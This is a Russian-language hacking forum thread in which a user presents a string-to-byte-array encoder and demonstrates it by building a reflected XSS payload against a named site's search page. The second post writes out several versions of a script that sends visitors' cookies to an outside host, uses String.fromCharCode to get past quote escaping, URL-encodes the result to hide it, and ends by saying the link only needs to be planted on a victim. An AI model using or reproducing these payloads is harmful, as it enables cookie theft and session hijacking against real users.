String To Buffer

Discussion in 'Безопасность и Анонимность' started by Joker-jar, 17 Jun 2007.

  1. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Написал небольшую утилитку для перевода строки в массив байт. Пока поддерживает синтаксисы MySQL, JavaScript, Delphi. А также URL и HTML Encode. Дальше больше.

    Иногда помогает :)

    скачать
     
    #1 Joker-jar, 17 Jun 2007
  2. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Обновил программу. Добавил парочку новых функций. Ссылка в первом посте

    Покажу пример, в случае которого может пригодиться моя программа. Беру последнюю XSS из соответствующего раздела:

    http://www.hackaday.com/search/?q="><script>alert(/XSS/)</script>

    К примеру, мне нужно увести кукисы с данного сайта. Я делаю ссылку вида

    http://www.hackaday.com/search/?q="><script>location.href='http://site.com?cookie='+document.cookie</script>

    или

    Code:
    http://www.hackaday.com/search/?q=%22%3e%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%73%69%74%65%2e%63%6f%6d%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
    Но данный скрипт работать не будет, так как на сервере экранируются кавычки.

    Я включю свою прогу, ввожу строку

    http://site.com?cookie=

    Конвертирую в JS буффер. Получаю:

    buf = new Array(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x73,0x69,0x74,0x65,0x2e,0x63,0x6f,0x6d,0x3f,0x63,0x6f,0x6f,0x6b,0x69,0x65,0x3d);
    buffer = new String();
    for (i=0;i<buf.length;i++)
    buffer += String.fromCharCode(buf);

    Дополняю скриптом и привожу к виду XSS:

    http://www.hackaday.com/search/?q="><script>buf=new Array(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x73,0x69,0x74,0x65,0x2e,0x63,0x6f,0x6d,0x3f,0x63,0x6f,0x6f,0x6b,0x69,0x65,0x3d);buffer=new String();for (i=0;i<buf.length;i++) buffer+=String.fromCharCode(buf);location.href=buffer+document.cookie</script>

    И, наконец, скрываю что там содержится:

    Code:
    http://www.hackaday.com/search/?q=%22%3e%3c%73%63%72%69%70%74%3e%62%75%66%3d%6e%65%77%20%41%72%72%61%79%28%30%78%36%38%2c%30%78%37%34%2c%30%78%37%34%2c%30%78%37%30%2c%30%78%33%61%2c%30%78%32%66%2c%30%78%32%66%2c%30%78%37%33%2c%30%78%36%39%2c%30%78%37%34%2c%30%78%36%35%2c%30%78%32%65%2c%30%78%36%33%2c%30%78%36%66%2c%30%78%36%64%2c%30%78%33%66%2c%30%78%36%33%2c%30%78%36%66%2c%30%78%36%66%2c%30%78%36%62%2c%30%78%36%39%2c%30%78%36%35%2c%30%78%33%64%29%3b%62%75%66%66%65%72%3d%6e%65%77%20%53%74%72%69%6e%67%28%29%3b%66%6f%72%20%28%69%3d%30%3b%69%3c%62%75%66%2e%6c%65%6e%67%74%68%3b%69%2b%2b%29%20%62%75%66%66%65%72%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%62%75%66%5b%69%5d%29%3b%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%62%75%66%66%65%72%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
    Все, осталось только грамотно подкинуть ссылку :)
     
    #2 Joker-jar, 30 Jun 2007
    Last edited by a moderator: 30 Jun 2007
  3. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    спс ! я что подобное делал на РНР :)
    Нужная штука ...
    Много раз выручала !
     
    #3 n0153r, 30 Jun 2007
  4. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    #4 Joker-jar, 3 Sep 2007
(You must log in or sign up to post here.)